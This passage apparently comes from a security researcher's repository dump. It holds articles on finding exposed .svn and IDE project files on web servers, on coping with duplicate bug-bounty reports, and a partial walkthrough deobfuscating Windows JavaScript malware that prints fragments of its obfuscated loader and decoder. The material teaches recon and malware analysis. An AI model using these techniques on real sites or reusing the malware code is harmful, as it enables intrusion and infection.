be:\n\n\n```\nhttp://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base\n```\n\nWhen we try to open this path in the browser, we should be able to download file or display its content directly in browser:\n\n\n![How to read content of file](assets/svn_read_file.png)\n\nAlso, an entry in REPOSITORIES table point to original repository path, which is:\n\n```\nsvn+ssh://192.168.1.4/var/svn-repos/project_wombat\n```\n\nThere's a lot of information here. Leaving _.svn_ folder on the web server is a huge mistake and can be very dangerous and it means full compromise of web application source code.\n\n\n# IDE project files\n\nIDE (Integrated Development Environment) used by many of developers have one in common - they save project's settings and a lot of additional information in their own files, created for each project separately. If such folder has been left on web server - this is yet another source of information about web application.\n\nLet's take a look a little bit closer and as example we use my favorite JetBrains products (https://www.jetbrains.com/).\n\n\n## JetBrains IDEs - IntelliJ, WebStorm, PHPStorm\n\n\nEvery project developed with one of JetBrains product creates its own hidden directory, _.idea/_.\nThis directory contains all information about project, files, directories and IDE settings.\n\n\n\n![sample .idea directory](assets/idea_tree.png)\n\n\nOne of those files is extremely valuable from Security Researcher point of view. _workspace.xml_ contains a lot of useful information, which allows to enumerate all files and folders, source version control system information and many others.\n\nWe spot them step by step:\n\n```xml\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t(...)\n\t<component name=\"FileEditorManager\">\n\t    <leaf>\n\t      <file leaf-file-name=\"README.md\" pinned=\"false\" current-in-tab=\"false\">\n\t        <entry file=\"file://$PROJECT_DIR$/README.md\">\n\t\t\t\t(...)\n\t</component>\n(...)\n```\nAll nodes in _component name=\"FileEditorManager\"_ contains all files and their relative paths (to project's root directory). Simply saying - it's just XML-wrapped result of Bash command _ls_ executed in main project folder :)\n\nIf you take a closer look at every _component_ node, you'll find information about used control version system, like in this example:\n\n```xml\n  <component name=\"Git.Settings\">\n    <option name=\"UPDATE_TYPE\" value=\"MERGE\" />\n    <option name=\"RECENT_GIT_ROOT_PATH\" value=\"$PROJECT_DIR$\" />\n  </component>\n```\n\nAlso, there are information about commits and other tasks executed on project files, in node _component name=\"TaskManager\"_:\n\n```xml\n(...)\n    <task id=\"LOCAL-00211\" summary=\"change WebSocket port to 1099\">\n      <created>1436206418000</created>\n      <option name=\"number\" value=\"00211\" />\n      <option name=\"project\" value=\"LOCAL\" />\n      <updated>1436206418000</updated>\n    </task>\n(...)\n```\n\nAnother interesting thing might be changes history, stored in _component name=\"ChangeListManager\"_ node:\n\n```xml\n\t<component name=\"ChangeListManager\">\n\t\t(...)\n\t\t<change type=\"DELETED\" beforePath=\"$PROJECT_DIR$/chat/node_modules/socket.io/node_modules/socket.io-adapter/node_modules/debug/Makefile\" afterPath=\"\" />\n\t\t(...)\n\t</component>\n```\n\nas well as in _component name=\"editorHistoryManager\"_ node:\n\n```xml\n(...)\n    <entry file=\"file://$PROJECT_DIR$/public_html/vendor/angular/angular.js\">\n      <provider selected=\"true\" editor-type-id=\"text-editor\">\n        <state vertical-scroll-proportion=\"0.0\">\n          <caret line=\"3233\" column=\"29\" selection-start-line=\"3233\" selection-start-column=\"29\" selection-end-line=\"3233\" selection-end-column=\"29\" />\n        </state>\n      </provider>\n    </entry>\n(...)\n\n```\n\nIf developer used to manage database with integrated DB manager, there are another very interesting files: _dataSources.ids_  where you can find databases structure, _dataSource.xml_, _dataSources.xml_, _dataSources.local.xml_ and _dbnavigator.xml_ contains example information:\n\n```xml\n        <database>\n          <name value=\"database_name\" />\n          <description value=\"\" />\n          <database-type value=\"MYSQL\" />\n          <config-type value=\"BASIC\" />\n          <database-version value=\"5.7\" />\n          <driver-source value=\"BUILTIN\" />\n          <driver-library value=\"\" />\n          <driver value=\"\" />\n          <host value=\"localhost\" />\n          <port value=\"3306\" />\n          <database value=\"mywebapp\" />\n          <url-type value=\"DATABASE\" />\n          <os-authentication value=\"false\" />\n          <empty-password value=\"false\" />\n          <user value=\"root\" />\n          <password value=\"cm9vdA==\" />   <!-- yes, this is password 'root' after Base64 decode :) -->\n        </database>\n```\n\nor even more, like _dataSources.local.xml_:\n\n```xml\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<project version=\"4\">\n  <component name=\"dataSourceStorageLocal\">\n    <data-source name=\"MySQL - mywebapp@localhost\" uuid=\"8681098b-fc96-4258-8b4f-bfbd00012e2b\">\n      <secret-storage>master_key</secret-storage>\n      <user-name>root</user-name>\n      <schema-pattern>mywebapp.*</schema-pattern>\n      <default-schemas>mywebapp.*</default-schemas>\n    </data-source>\n  </component>\n</project>\n\n```\n\nEverything depends on project itself, used IDE plugins (like debugger, source version control or DB manager). In general, it is worth to take a look around and investigate every _component_ node.\n\n\nAs you can see, this is very interesting source of information. I suggest you to download any JetBrains IDE (they offer 30 days trials of almost every product, even more - you can download IntelliJ Idea Community or PyCharm Community and use it for free), then create sample project, add some folders and files, try to manage Git or SVN, create sample database connection and play around with Database Manager - and then dig into _.idea/_ folder to see what you can find there.\n\n\n## NetBeans IDE\n\n\nNetBeans (https://netbeans.org/) is another very popular, free IDE for Java, C/C++, PHP, HTML5 and JavaScript development. Currently supported (and owned) by Oracle, NetBeans becomes an official IDE for Java applications and it's absolutely free and open source.\n\nNetBeans, as JetBrains IDEs, creates its own folder in project's root folder, contains all project settings - _nbproject/_\n\nNetBeans is not as verbose as IntelliJ, PHPStorm or WebStorm, but you can still find some interesting information, which might be helpful when you are looking for particular attack vector against vulnerable web application. _project.xml_ is a good point to start investigating NetBeans project configuration.\n\n\n![NetBeans project configuration](assets/nb_tree.png)\n\n\n## ActiveState Komodo IDE\n\nUnfortunately, Komodo IDE does not provide any information about project, the only file I've found in directory with project files was short XML file with content below:\n\n```xml\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!-- Komodo Project File - DO NOT EDIT -->\n<project id=\"6a2f24b2-0c3d-f44c-bf66-f4341c507a30\" kpf_version=\"5\" name=\"bwapp.komodoproject\">\n<preference-set idref=\"6a2f24b2-0c3d-f44c-bf66-f4341c507a30\" id=\"project\" preftype=\"project\">\n</preference-set>\n</project>\n```\n\nFilename is created using simple patter: project name, then dot, then 'komodoproject' postfix:\n\n```bash\n$ ls -l | grep komodo\n-rw-r--r--   1 bl4de  staff    300 Feb  4 23:19 bwapp.komodoproject\n```\n\nAll project information Komodo IDE stores in folders not accessible from web server - as far as you don't find Local File Include vulnerability, of course - but if you find LFI, I don't think you will have to find Komodo project configuration file anymore ;)\n\n\n# Miscellaneous developer tools configuration files\n\n\nThere's a lot of configuration files of additional developer tools, which names mostly start with dot and contain a lot of information about used technologies, libraries, some directories not available directly from the browser or even not detectable by tools like DirBuster (http://sourceforge.net/projects/dirbuster/).\n\nSome examples of these tools are _npm_ (https://www.npmjs.com/), linters for JavaScript, like ESlint (http://eslint.org/), Bower package manager (http://bower.io/) and many others.\n\nLet's take a look at sample _bower.json_ file, which contains configuration for Bower and contains list of packages used in web application (frontend side):\n\n```bash\n{\n  \"name\": \"testapp\",\n  \"version\": \"2.1.0\",\n  \"authors\": [\n    \"Rafal 'bl4de' Janicki <bloorq@gmail.com>\"\n  ],\n  \"description\": \"test application\",\n  \"main\": \"index.html\",\n  \"moduleType\": [\n    \"globals\"\n  ],\n  \"license\": \"MIT\",\n  \"dependencies\": {\n    \"angular\": \"1.4\",\n    \"pure\": \"~0.5.0\",\n    \"angular-route\": \"~1.2.26\",\n    \"angular-ui-router\": \"~0.2.11\",\n    \"angular-bootstrap-datetimepicker\": \"latest\",\n    \"angular-translate\": \"~2.6.1\"\n  },\n  \"devDependencies\": {}\n}\n\n```\nMaybe more interesting from security point of view is similar file for _Node.js_ or _io.js_ backend application - _package.json_ (if you find the way to read this file from web server, by for example Local File Include error - see https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion for more information about LFI).\nAs it is a list of server side details - used packages, like database connectors, middleware components and so on - this file could contains a lot of valuable information about potential vulnerable software.\n\nSample _package.json_ shows, that there's MySQL database used (probably) and some client-server communication via WebSockets:\n\n```bash\n{\n  \"name\": \"Test application server dependencies\",\n  \"version\": \"1.0.0\",\n  \"author\": \"bl4de\",\n  \"dependencies\": {\n    \"socket.io\": \"^1.3.5\",\n    \"mysql\": \"^2.9.0\"\n  }\n}\n```\n\nThere are also files like _.bowerrc_, _.eslintrc_, _.jshintrc_ and similar. As they not contain very sensitive information, there's always a chance that you can find some details about web application architecture, used libraries and/or frameworks, or even some valuable information put in comments. It's always worth to look into if you found them during reconnaissance phase.\n\n\n# Summary\n\nIt is always worth to check if one of mentioned folder exists on the web server. Git repository is just a disaster, as it allows to download source code of web application, as well as IntelliJ IDE project configuration folder.\t If you are using automated scanners (like DirBuster or similar) it's worth to check if those folders already exists in your dictionary files and add them if they don't.\n\nHappy Hacking! :)\n\n# Recommended tools\n\nHere's a list of tools which may help discover hidden content\n\n### BFAC by @mazen160\n\nBFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code. \n\nAn absolute amazing tool to discover backup files created and maintained by Mazin Ahmed.\n\n\nhttps://github.com/mazen160/bfac\n\n\n\n\n\n\n\n\n"
  },
  {
    "path": "how_to_deal_with_dupes/hot_to_deal_with_dupes.md",
    "content": "## How to deal with duplicates (and start to like them, with a little help of Jennifer Lawrence ;) )\n\n### Intro\n\nIf you are Bug Bounty Hunter, you know that feeling, when your report is marked as 'Duplicate'. This moment is like 4th place in the race - you were so close to the podium. So close to Gold, Silver or Bronze. But you've finished with nothing and the only thing left to do for you is to watch medal ceremony from tribune. And cry.\n\nIn bug bounty programs you compete against other hunters in hunting for bugs. Two biggest and most popular bug bounty platforms (HackerOne and Bugcrowd) maintain programs for their clients and allows you to send to those programs something called 'Report' - which is description of security issue you have found with all required information about your finding (what kind of bug, where did you find it, how to reproduce it and, if you know how to do this - how to mitigate it).\n\nProgram can accept your report, if it's valid, or rejects one if bug you found is not valid, program maintainers can't reproduce it or you found this bug in resource which is 'Out of scope' ('Out of scope' is the way programs treat particular types of vulnerabilities as not potential security issues, or marks resources like web application or server as something you should not look for bugs there). Typical examples of out of scope issues are CSRF on logout, self XSS with no security impact or lack of specific, security related HTTP headers in server's response.\n\nIf you send reports, which are defined as 'Out of scope', those reports likely will end up as 'Not applicable', which has some consequences for researchers (depends on the platform), including loosing reputation points or even disqualification from the program.\n\nIf your report is correct (vulnerability you have found exists, you have prepared report with all required information, detailed step-by-step Proof of Concept, is reproducible by the program maintainers and has security impact) - your report will be triaged and resolved. You will gain Reputation points, maybe some nice swag and (in monetary programs) finally get the bounty, which is all what bug bounty hunting is about, right? :)\n\n### 'XXX closed the report and changed the status to Duplicate'  :(\n\nBut there is one, very specific situation, when your report is valid (thus, it can't be rejected as 'Not applicable'), you have prepared the best PoC you could, issue is definitely in scope and has significant security impact - in general, everything's going fine and you're already starting to count money you will get. You get notification, your heart starts to beat faster and faster, you open your mailbox and...\n\n![dupe](dupe1.png)\n\nOuch :/\n\n4th place. No medal. You were good, but not fast enough. \n\nThe worst feeling bug bounty hunter can feel.\n\n![dupe](empty.gif)\n\nIf you know that feeling - don't worry, been there, done that. Nobody likes duplicates (or 'dupes' like some researchers call them). Getting duplicates constantly, if you're participating in public programs and compete against hundreds of other researchers is a routine. Duplicates also are nothing special in private, invite-only programs, where there are not as many researchers, but their level of knowledge and skills allow them to find most of low hanging fruits and not-so-low hanging fruits as well very quickly.\n\nThis can be very frustrating and demotivates you from hunting. You're starting to think if all your effort you put in finding the bug you've get dupe for is worth all energy you've put in.\n\nThe good news is: yes, it is worth all that energy. Every single second you have spent on bug and report. And here's why.\n\n\n### Why duplicates aren't that bad or even why they are actually pretty good - for you.\n\nLet's assume issue you have found in private program you have been just invited to and ended up with 'Duplicate'. It's RCE (Remote Code Execution) in web application written in Java, run on Tomcat application server in internal network. You have found this issue by exploiting template injection in JSP (Java Server Page) file along with SSRF (Server-Side Request Forgery). \n\nYour reaction when you see your report is a duplicate is obvious - anger mixed with disappointment. Something what Katniss Everdeen could feel when she was presenting her skills as District 12 tribute, but sponsors did not really care:\n\n![thankyou](thankyou.gif)\n\n\nBut hold on there for a second. It's not Hunger Games :)\n\nFirst thing - ask yourself what you had to do to find this issue. Let's get through, step by step, and see what you've could learn from this duplicate:\n\n#### You had to find out, what software is running on this server.\n\nThis requires some recon to be done - maybe basic banner grabbing, maybe something little bit more sophisticated, like port scanning with nmap and -sV option set. You had to use some tools - like netcat, nmap, maybe nikto. Some of those tools might be pretty new for you, or with some of them you are not very familiar and you needed to 'man' them a little bit first.\n\n#### You had to figure out how website is build\n\nDid you spot JSESSIONID in cookies indicates that this is Java application? Maybe there was HTTP header set with JSP string in it? Maybe you triggered an error with 404 Not Found standard Tomcat response?\n\n#### You had to actually spot that user input is reflected in JSP file\n\nThat was it, right? You figured out that one of user inputs is reflected in HTML output and you realized it has to be processed by the server in some way? How long it took you to craft working exploit and see response from your command you have sent to the server, like 'whoami' or 'uname -a'? How many blog posts you have to read, like this one for example:\n\nhttps://blog.netspi.com/hacking-with-jsp-shells/\n\n\n#### Finally, you had to figure out that there is request sent to that internal server, which leads directly to SSRF\n\nThe input from JSP file is used in request sent to internal server, behind the firewall. This server is unaccesible form outside, but this particular injection you have just found in JSP file allows you to spot that response comes from something hidden deeper in program's network. If SSRF was something new for you (let's assume that it is true) - an enormous effort had to be put from you to exploit this and turn into fully exploitable RCE. Hours, if not days spent on reading, searching, looking in Hacktivity for similar reports to find out how it can be done.\n\n#### Last, but not least - you had to write report and put detailed Proof of Concept there\n\nWrite a good report is also a part of the whole process (IMHO it's one of the hardest steps). With every report written - you gain new skills, you actually __learn__ how to describe issue you've just found in the way people from the program can understand.\n\nIt takes a lot of time and a lot of effort. It's not straightforward, it's not just to fill out the template. Every report (if it's good) is unique, like vulnerability you found. And the way to discover the vulnerability and exploit it, especially more severe like RCE, is unique as well.\n\nAnd this is what makes every duplicate a good thing:\n\n- it forces you to __learn__. __A lot__. With every bug you found, with every new report you write - your knowledge and skills grow up. __Practice makes the master__. No other words fit here better than this old quote.\n\n- if you exploit something in completely new stack for you, __you always win__. You have to master new tools and techniques. Every stack requires different approach and methods to exploit the same category of vulnerabilities. Remote Code Execution exploitation in LAMP (Linux/Apache/MySQL/PHP) stack application is totally different than exploiting the same issue in Node.js or Java application\n\n- you __learn new programming languages__. To be able to exploit RCE in application you have no previous experience with, it requires from you at least basic understanding of language syntax, encoding it uses, how to get readable output - all those things which makes your exploit actually working\n\n- it is very common that you end up with duplicate only to realize that there is another vulnerability right beside the one you have just found. RCE is duplicate? Maybe there is Stored XSS in the same screen, if application does not sanitize user input correctly? Maybe you have just found a way to bypass WAF (Web Application Firewall) because of syntax trick you have just used and it allows you to exploit XSS you couldn't exploit earlier due to WAF?\n\nThose were technical things. But there are other as well, maybe even more important if you are going to dive into bug bounty and makes it your lifestyle:\n\n- you know that __you can find very severe vulnerabilities__. You are getting more self-confident. You weren't first, but you need to realize __it does not matter__ really. You could not know that someone else just found the same bug. \n\nThere is the best summary of this, posted on Twitter by @abhijeth:\n\n<img src=\"tweet1.png\" width=\"480px\"/>\n\n\nsource:https://twitter.com/abhijeth/status/915747406938963968\n\n\n__Bug was there and you have found it__, exploit it and gain remote code execution in something you have no idea how it works earlier. Remember that bug bounty hunting is almost always a 'black box' in penetration testing methodology - that means you have no idea what's under the hood until you actually dig into.\n\nIt's not your fault when you end up with duplicate. Remember - there will be always someone better than you  (just look on the Leaderboard and compare your position and number of bugs found :) ). But if you can find very, very severe bugs in the same fashion like @Mr Hack, @meals, @Geekboy, @mongo, @yappare, @zseano or @mlitchfield - nothing can stop you from heading to the Top!!!\n\n\n![yeah](ohyeah.gif)\n\n\n- it's always good to win. How to deal with defeat is much harder to learn. Duplicates can teach you persistence, patience and something which I did not realized until I found valid, triagged and resolved later bug in the same program I've found duplicate couple of days earlier - getting up after you have felt down (mentally ;) ) It's all about __don't giving up__.\n\nDon't think in short term - 'Oh God, it's a dupe! I'm doomed :('. Think in the long term. For every duplicate you get, there are (or will be) two, three, five or ten valid reports. Duplicates are, from their nature, impossible to omit. __Always remember you are not the only one hunting for bugs__. This is especially important in most popular, public programs out there like Yahoo, General Motors, Uber, Shopify or VK.com.\n\nJust look at the numbers of bugs found in those programs. Hundreds, even thousands (like Yahoo). How many of them were accompanied with five, ten or twenty duplicates? Many. It's inevitable.\n\nYes, dupes are a part of bug bounties. Hunt with this in mind.\n\n![cool](cool.gif)\n\n\n### How to avoid duplicates. If it's even possible.\n\nShort answer - no, it's not possible due to all reasons I've already explained earlier. But there are some simple methods you can use to at least try to avoid obvious dupes (trying is good, always remember Offensive Security motto: __Try Harder!__):\n\n- if you are working on new program (let's say in the first 48 hours after program went out public) - any __low hanging fruit__ like Reflected XSS in 'Search' input, Open Redirect in URL, hardcoded credentials in HTML or JavaScript source, SQL Injection on ID parameter in URL or Local File Include in something like _index.php?include=about/careers.php_ are already reported if you did not spot them in first 5 minutes of program life.\n\nDeal with this. New public program is the most desired thing on any bug bounty platform nowadays. There are roughly five to ten thousands active researchers on HackerOne and probably on Bugcrowd as well - from the other point of view public programs don't start very often.\n\nFor guys without wide choice from private programs to work on - it's the only way to gain Reputation (I was starting in exactly the same way). So there will be hundreds of them there already. \n\nChances that you will be first to spot low hanging fruit are very small. Tiny little one.\n\n- if public programs are the only option for you for now, try to find one with as wide scope as possible\n\nStart from looking at Hacktivity (feature on HackerOne which allows to see all resolved reports, many of them with full disclosures) in such program. What types of bugs are the most popular? Which services are most attacked? How many bugs were resolved so far? How many researchers were revarded? When the last bugs were disclosed?\n\nYou should look for programs where:\n\n- scope is wide as mentioned earlier - the best examples for me are so far Yahoo and __General Motors__. Especially second one looks interesting, because literally __everything__ is in scope. I was able to report the weirdest issues I was able to spot, some of them with almost no or very little security impact. Every report I've sent to GM program was triaged and GM Security Team never left any of vulnerability I've found not triaged or without any response.\n\nAnother worth to mention program with very wide scope is __US Departament of Defence__ bug bounty program available on HackerOne platform. This program has very well defined scope, without any exclusions:\n\n```\nAny public-facing website owned, operated, or controlled by DoD, including web applications hosted on those sites.\n```\n\n\n\nThe result is that for 29 reports I've sent to GM program so far, only 7 were not fully resolved - including __five of them__ were actually duplicates (plus two closed as 'Informative' without any security impact for GM and Reputation for me). Only 5 dupes in 29 reports in total, in public program which runs for two years and has about one hundred hunters involved so far is quite good result I think.\n\n- there are many different categories of reported issues\n\nIf program scope contains only one target and almost all reports are Reflected XSS - if you found one, chance that this will be duplicate is bigger than when there are various types of vulnerabilities, because that means the target is pretty vulnerable and not well developed. If there are many vulnerabilities based on lack of input validation, both on client and server side - try to focus on something more severe.\n\n- if program is very active and there were reports resolved in last couple of days - probably is very popular and many bugs are found on daily basis\n\nThat means only one thing - getting duplicate is more likely here than in program which has last resolved reports dated in weeks or even months. In that case this could mean targets in scope are pretty hard to hack, thus has not so many low hanging fruits, requires more work involved to spot vulnerability and vulnerabilities are not that easy to exploit due to WAFs, sanitization of user input or stack used to build - it can be something not as popular as LAMP or Ruby on Rails (like Go - I was able to find only one web application written with Go in programs I am dealing with).\n\n- if you have software developer background like me - maybe try to focus on programs with open sourced codebase (like my favourite concrete5, where I hold 2nd position with 12 resolved reports and 4 duplicates)There are not as many researchers looking for issues in such programs by analyzing source code.\n\nWhen you have source code in front of your eyes, build with language(s) you are familiar with for years and you know what to look for - chances that you will find something really severe are very high. Also, there are many vulnerabilities which are almost impossible to find in traditional, black-boxed hunting based on fuzzing with common payloads, like nuances in business logic which allows to gain privillege escalation or get code execution because of some old, hidden functionality or that one weird 'if' condition which is true only for someone with username 'JenniferL' ;)\n\n\n### Let duplicates to become your best friends!\n\n![friends](friends.gif)\n\nDuplicates are good. Try to like them for all that knowledge you gain from them. They won't harm your Reputation as much as Informative or Not applicable. The last ones is something you have to avoid __always__. It's actually pretty easy:\n\n- read the scope, very carefully.\n\nIt's the easiest part. 'Out of scope' means out of scope. Don't even try to report anything shich is included in 'Out of scope' section of program description.\n\nThere are some vulnerabilities you maybe found in some resource marked as out of scope but you believe it can hurt program very badly. In such case - try to contact program maintainers directly and ask them if they will consider your finding as valid and will accept it. If yes - don't forget to mention about this in your report. Best thing is to attach mail communication with program team member, where there is clear statement that program will accept your submission. The person you inform about it might not be the same which will investigate your report and it's better (and saves time on both sides and avoid unnecessary closing and reopening report several times) to keep things clear from the beginning.\n\nBesides this one exception - __never, ever report anything which is out of scope__. Just don't. It's a golden rule of your good reputation on bug bounty program.\n\nIf you won't follow this rule - you will end up with negative Signal and your reputation will go down very quickly, which in fact ruins all your chances for any invitation to private program in the nearest future.\n\nLast, but not least - every dupe adds 2 points to your Reputation (on HackerOne platform) when original report gets resolved. It's not 7 points as for resolved one, but still something better than 0, isn't it? :)\n\nNow, let's get into some metric details related to duplicated reports on Bugcrowd and HackerOne.\n\n### Bugcrowd Bounty Platform Metrics related to Duplicates (by @jhaddix)\n\nAnother way to look at Duplicates optimistically is that they offer a newer bug hunter some opportunity to receive private program invites. The criteria for Bugcrowd's invites are as follows:\n\n![privprogs](privprogs.png)\n\nIn this system, duplicates do NOT impact your average submission priority so if a researcher reports two issues: one an accepted :P1: and another duplicate :P1: their average submission priority is still 1.0.  \n\nThe standard points value of duplicates is as follows:\n\n```\naccepted: {\n      p1: 40,\n      p2: 20,\n      p3: 10,\n      p4: 5\n    },\n    duplicate: {\n      p1: 10,\n      p2: 5,\n      p3: 2,\n      p4: 1\n    },\n    rejected: {\n      not_applicable: 0,\n      not_reproducible: -1,\n      out_of_scope: -1,\n      wont_fix: 0\n    }\n```\n\nDuplicates are definitely still benefiting bug hunters! As you accrue points and reputation you are bound to get more private program invites!\n\n\n![haters](haters.gif)\n\n\n### HackerOne Metrics related to Duplicates.\n\nHackerOne reputation system defines that every duplicate report is worth 2 Reputation points, no matter of severity or how many reputation points original report gets. Based on this, you shoud be aware of negative impact of duplicates on your Signal Metric. Signal (in HackerOne terminology) is an average Reputation points gained by report (without additional points gained for monetary bounties).\n\nIf you are sending only valid reports, your reports are first every time and triaged and resolved - your Signal will be no more or no less than 7.00. If you are able to keep that Signal all the time - you're doing brilliant job there!\n\n\n![happy](happy.gif)\n\n\nUnfortunately, it's not possible in the long term and duplicates are one of the reason of this. But no worries, having Signal like 4.50 or 5.20 is perfectly fine. As long as your Signal won't fell down to -2.34 for example, because that means you're sending a lot of 'Not applicable' reports, which costs you literaly minus five Reputation points.\n\nSo even if duplicates harms you from time to time - the good news is they actually increases your Reputation and it's not possible to end up with negative Reputation. \n\n\nBetter this than nothing, right ;) ?  \n\n\n![happy](why.gif)\n\n\n\n### Final words\n\nAt the moment I'm writting these words, I have 63 reports in total (closed and triaged) where 13 of them are duplicates. But even though they cost me 65 points of Reputation less (13 * 2 instead of 13 * 7) - I've learnt a lot from them. In my dupes there are reports including vulnerabilities like:\n\n- time-based SQL Injection in ASP.NET+MSSQL application (I was not very good at exploiting this stack, so it was good lesson)\n- another SQL Injection in ASP.NET application (yeah, it seems I am not very lucky with ASP stack ;) ) - again, it requires from me a lot of work to exploit this one as well\n- Stored XSS (couple of them in various programs)\n- Reflected XSS including two found in 'Search' features (one I've found in Starbucks, about an hour after it went public - classical low hanging fruit found by someone probably in first minutes, it was so obvious that it was impossible to get this not duplicated after the whole hour :D )\n\nI can't even say how much time I've spent on all of them in total, how many blog posts I've read. For sure my skills in writting custom tools and exploits in Python were improved. I have to read almost every whitepaper about exploiting SQL Injections in ASP.NET+MSSQL applications available in the whole Internet (I'm pretty familiar with this right now and it will be much easier for me to exploit such vulnerabilities in the future). And I don't know how many new XSS payloads I've used, including reading probably all posts on @Brute's blog (thanks Brute!)\n\n\nI hope you will look at every single duplicate you'll get in the future in different way, as I've used to. Of course, I wish you not too many of them! But getting duplicates is a part of being Bug Bounty Hunter, like being hit in the face is pretty normal for every boxer in the world :)\n\n\nNow, tell me, duplicates aren't that bad as you might think, are they?\n\n\n![uhm](uhm.gif)\n\n\n:)))\n\n__Kudos for Jason Haddix (@jhaddix) from Bugcrowd for adding information about duplicates in Bugcrowd platform.__\n\nHappy Hunting!\n\nbl4de\n"
  },
  {
    "path": "javascript-malware-obfuscation/Simple_JavaScript_malware_code_obfuscation_examples.md",
    "content": "# Simple JavaScript malware code deobfuscation walkthrough\n\n\n__WARNING! Files ```do_not_run.js``` and ```do_not_run_deobfuscated.js``` contains Windows-targeted malware written in JavaScript and prepared to run with Windows Script Host (WSH) engine and can potentially harm your machine if you'll try to run them directly.__\n\n__As I do not have Windows machine and did not test it on any Windows version, I can't give any warranty those files are safe to run on Windows. If you will decide to run them, it's up to you.__\n\n---\n\n## Table of contents\n- [First look](#first-look)\n- [Entry point - IIFE](#entry-point---iife)\n- [Basic obfuscation methods - expressions, comma operator, parseInt() and toString() method](#basic-obfuscation-methods---expressions-comma-operator-parseint-and-tostring-method)\n- [Getting function constructor](#getting-function-constructor)\n- [Logical operators tips and tricks](#logical-operators-tips-and-tricks)\n- [Summary](#summary)\n\t\n\nA couple of days ago my colleague found a piece of malicious JavaScript on his Windows machine. Luckily, this code did not run and did not harm his system.\n\nI decided to take a look at it and go through the code. What I've found were quite simple, but still interesting methods to obfuscate JavaScript code. I'd like to explain some of them as they base on some JavaScript less known quirks - they still can be found in documentation, however in production code we do not use it very often.\n\nThis writeup is intended for beginner JavaScript developers and/or malware analysis. I will explain everything while doing code deobfuscation step by step.\n\n## First look\n\nIf you open file ```do_not_run.js``` from this repository (it contains legacy malware code) in text editor (I __strongly recommend you not to run it if you're on Windows machine__ :-) ) - you'll see a big mess, hard to read, hard to figure out what's going on - but it's still valid and working JavaScript code.\n\nHow it's even possible?\n\n## Entry point - IIFE\n\nEverything starts from top-level IIFE (Immediately Invoked Function Expression). This is a way to run function in JavaScript without calling it directly.\n\nConsider example:\n\n```javascript\nfunction hello(message) {\n\tconsole.log(message)\n}\n```\n\nIf you try to run this code, nothing will happen. To make it work, you have to call function ```hello()``` passing some message as an argument:\n\n```javascript\nfunction hello(message) {\n\tconsole.log(message)\n}\n\nhello('This is test')\n```\n\nNow, you should be able to see ```This is test``` message displayed in your browser (or Node) console.\n\nLet's make IIFE from this code:\n\n```javascript\n(function hello(message) {\n\tconsole.log(message)\n})('This is test')\n```\n\nAnd some magic happen - even without calling ```hello()``` function, this piece of code works. How it's possible?\n\n* parenthesis around function definition makes a valid JavaScript expression from it. Expression is the simplest piece of code which returns a value (like ```2+2``` which is also valid JavaScript expression).\n* parenthesis with ```This is test``` __runs__ the function passing an argument to it. Technically, ```(fn(x){})(x)``` is equivalent of ```fn(x)``` definition and call in one.\n\n---\n\nIIFE recommended read\n\nhttps://github.com/getify/You-Dont-Know-JS/blob/master/scope%20%26%20closures/ch3.md#invoking-function-expressions-immediately\n\n---\n\n\nIn our malware sample we have similar call:\n\n\n```javascript\n(function(quhuvu6) {\n\n\t// ...\n\t\n}(\"41553a304f0b442551284206\" + \"672651014d1e1a60127\" + ...\n```\n\n\nThis causes malware runs on its own; passing some very, very long ASCII string as an argument for IIFE. Then, first line inside this function is run:\n\n```javascript\nvar defiq = cicuza(quhuvu6);\n```\n\nThe result saved in variable ```defiq``` is an array of decimal values, with about 9000 elements. Function, which transforms ASCII string into this array uses couple of tricks, which now we'll analyze in details.\n\n\n## Basic obfuscation methods - expressions, comma operator, parseInt() and toString() method\n\nFirst, take a look at ```cicuza()``` function, before we'll go through and simplify it to more clean and readable version:\n\n```javascript\nfunction cicuza(syhri) {\n        var fahomyfo = [];\n        for (var segovmiw4 = parseInt((0).toString(36)) /*CN1b367Z19XZqi8XgI67*/ ; segovmiw4 < syhri[\"l\" + (\"F\", \"T\", \"H\", \"e\") + \"n\" + (\"G\", \"n\", \"O\", \"g\") + (29).toString(36) + (\"u\", \"X\", \"U\", \"p\", \"h\")]; segovmiw4 += parseInt((2).toString(36))) {\n            fahomyfo[(\"E\", \"w\", \"f\", \"F\", \"p\") + (\"G\", \"i\", \"L\", \"u\") + \"s\" + \"h\"](parseInt(syhri[\"s\" + \"u\" + \"b\" + \"s\" + (\"M\", \"h\", \"M\", \"U\", \"f\", \"t\") + (\"M\", \"q\", \"r\")](segovmiw4, (85, 19, 84, 9, 2)), parseInt((42).toString(0x24)) /*uShFAoMcgqPvcds6w2xD*/ ));\n        }\n        return fahomyfo;\n    };\n    \n```\n\nFirst step - let's rename ```fahomyfo``` to something meaningful. Names like this are very common in malware - it's just some way to hide real purpose of each variable or function.\n\nIn ```cicuza()``` variable ```fahomyfo``` is declared as an array and then, after some logic in ```for``` loop - returned as a result.\nSo let's name it ```result```:\n\n```javascript\nfunction cicuza(syhri) {\n        var result = [];\n        for (var segovmiw4 = parseInt((0).toString(36)) /*CN1b367Z19XZqi8XgI67*/ ; segovmiw4 < syhri[\"l\" + (\"F\", \"T\", \"H\", \"e\") + \"n\" + (\"G\", \"n\", \"O\", \"g\") + (29).toString(36) + (\"u\", \"X\", \"U\", \"p\", \"h\")]; segovmiw4 += parseInt((2).toString(36))) {\n            result[(\"E\", \"w\", \"f\", \"F\", \"p\") + (\"G\", \"i\", \"L\", \"u\") + \"s\" + \"h\"](parseInt(syhri[\"s\" + \"u\" + \"b\" + \"s\" + (\"M\", \"h\", \"M\", \"U\", \"f\", \"t\") + (\"M\", \"q\", \"r\")](segovmiw4, (85, 19, 84, 9, 2)), parseInt((42).toString(0x24)) /*uShFAoMcgqPvcds6w2xD*/ ));\n        }\n        return result;\n    };\n\n```\n\nOk, now, let's see what's going on in ```for``` loop. First part is to define initial value of variable which determines start value:\n\n\n```javascript\nfor (var segovmiw4 = parseInt((0).toString(36)) /*CN1b367Z19XZqi8XgI67*/ ; ....\n```\n\nSo, what ```parseInt((0).toString(36))``` does?\n\nFirst call is ```(0).toString(36)``` - this code contains two chained operations:\n\n* ```(0)``` is an expression, which value is number 0\n* ```.toString(36)``` is a method which returns String representation of 